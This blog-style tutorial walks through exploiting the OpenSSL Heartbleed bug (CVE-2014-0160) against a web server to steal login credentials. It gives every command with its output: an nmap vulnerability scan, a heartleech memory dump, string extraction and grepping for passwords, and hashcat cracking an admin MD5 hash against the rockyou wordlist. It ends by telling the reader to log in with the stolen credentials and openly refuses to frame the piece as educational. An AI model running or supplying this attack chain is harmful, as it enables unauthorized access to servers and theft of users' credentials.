SSL HeartBleed – how to fetch confidential information from web server


        SSL HeartBleed (CVE-2014-0160) – this is know security vulnerability bug in OpenSSL protocol of version 1.0.1 through 1.0.1f and 1.0.2-beta.

        A vulnerability in OpenSSL could allow a remote attacker to expose sensitive data, possibly including user authentication credentials and secret keys, through incorrect memory handling in the TLS heartbeat extension.

        I am not going to explain what this bug can do or how it present in protocol side of SSL. More detail about it you can find on official US Government web site US-CERT [ United states computer emergency readiness team ] and HeartBleed web site.





        I will show here how to fetch confidential information like user credentials, session ID, cookies ID and etc … from vulnerable web site…


        In my example I will use network scanner NMAP to identify vulnerable web site with affected SSL version protocol to start dumping huge memory data as binary stream for offline analyzing and continue penetration task to take control of confidential information:


$ nmap -p 443 –script=ssl-heartbleed www.testserver.com

Starting Nmap 6.47 ( http://nmap.org ) at 2015-01-11 17:26 WAT
Nmap scan report for www.testserver.com (10.10.10.11)
Host is up (0.25s latency).
rDNS record for 10.10.10.11: 10.10.10.11.local.net
PORT    STATE SERVICE
443/tcp open  https
| ssl-heartbleed:
|   VULNERABLE: ——— This is identify that website is affected by SSL bug
|   The Heartbleed Bug is a serious vulnerability in the popular OpenSSL cryptographic software library. It allows for stealing information intended to be protected by SSL/TLS encryption.
|     State: VULNERABLE
|     Risk factor: High
|     Description:
|       OpenSSL versions 1.0.1 and 1.0.2-beta releases (including 1.0.1f and 1.0.2-beta1) of OpenSSL are affected by the Heartbleed bug. The bug allows for reading memory of systems protected by the vulnerable OpenSSL versions and could allow for disclosure of otherwise encrypted confidential information as well as the encryption keys themselves.
|
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160

|       http://cvedetails.com/cve/2014-0160/
|_      http://www.openssl.org/news/secadv_20140407.txt

Nmap done: 1 IP address (1 host up) scanned in 1.64 seconds


Now we will dump all memory from the server into our system for offline analyzing.

For this task we gona use heartleech-master tool.

This is a typical “heartbleed” tool. It can scan for systems vulnerable to the
bug, and then be used to download them. Some important features:

  – conclusive/inconclusive verdicts as to whether the target is vulnerable
– bulk/fast download of heartbleed data into a large files for offline
processing using many threads
– automatic retrieval of private keys with no additional steps
– some limited IDS evasion
– STARTTLS support
– IPv6 support
– Tor/Socks5n proxy support
– extensive connection diagnostic information


This is example how you need to dump a lot of memory data from vulnerable web site :

 

$ ./heartleech www.testserver.com –dump dump.bin –threads 10

— heartleech/1.0.0i —
https://github.com/robertdavidgraham/heartleech
C288360 bytes downloaded (4.720-mbps))


Here we will store all data into binary file dump.bin. We running dump process with 10 parallel threads for faster stream and be able catch up more data from the server.


Now we need extract ASCI text information from binary file. We can do it with simple command “strings” which is present in all UNIX based systems and Linux. This is syntax of command:


# strings dump.bin > output.txt


Now our output.txt file contain all strings in human readable format. Let do some search of interesting data inside this file, let say PASSWORD !!!!


# grep pass output.txt


ing.http_input             pass
nput             pass
8mbstring.http_input             pass
9mbstring.http_output            pass
pass
pass
pass
pass
a:3:{i:0;s:6:”update”;i:1;i:1;i:2;O:8:”stdClass”:26:{s:3:”uid”;s:1:”1″;s:4:”name”;s:5:”admin“;s:4:”pass”;s:32:”608f0b988db4a96066af7dd8870de96c“;s:4:”mail”;s:22:

superuser@gmail.com“;s:4:”mode”;s:1:”0″;s:4:”sort”;s:1:”0″;s:9:”threshold”;s:1:”0″;s:5:”theme”;s:0:””;s:9:

“signature”;s:0:””;s:16:”signature_format”;s:1:”0″;s:7:”created”;s:10:”1300091817″;s:6:”access”;s:10:”1420457009″;

s:5:”login”;s:10:”1420456991″;s:6:”status”;s:1:”1″;s:8:”timezone”;s:4:”3600″;s:8:”language”;s:0:””;s:7:”picture”;s

::”roles”;a:1:{i:2;s:18:”authenticated user“;}}}


Here is it !!!!

We’ve got required information:

Username: admin

E-mail: superuser@gmail.com

Password: 608f0b988db4a96066af7dd8870de96c —– in MD5 hash format

Status: authenticated user


Now we need decrypt MD5 Hash based Password into human readable format. We will user hashcat tool to compare crypto password with one of our password dictionary. I will use password dictionary Rockyou from SkullSecurity web site.


Before start extracting MD5 HASH password we need create a TEXT file with HAS password per line. Let name it hash_passwd.txt.

Now to start extracting password we need run next command:


# ./hashcat-cli64.app ./hash_passw.txt ./rockyou.txt

Initializing hashcat v0.49 with 4 threads and 32mb segment-size…

Skipping line: flower (line length exception)
Added hashes from file ./passw.txt: 406 (1 salts)

NOTE: press enter for status-screen
608f0b988db4a96066af7dd8870de96c:flower

Input.Mode: Dict (./rockyou.txt)
Index…..: 1/5 (segment), 3627099 (words), 33550343 (bytes)
Recovered.: 87/406 hashes, 0/1 salts
Speed/sec.: 18.32M plains, 18.32M words
Progress..: 3627099/3627099 (100.00%)
Running…: 00:00:00:01
Estimated.: –:–:–:–


DONE !!!!

Our extracted password is saved to file hashcat.pot on the current working directory.


Now – you have all required credential in your hand, you can login into remote web site with e-mail and password and get access to User registered page ….


One more Important thing !!!!

I will not gonna warn you that this article only for education purpose … You are enough adult person to understand it and if you are here, in this page – you know perfectly well how to use this knowledge.

From my side – I don’t taking any responsibility of your behaving ….

Have a safe system !!!!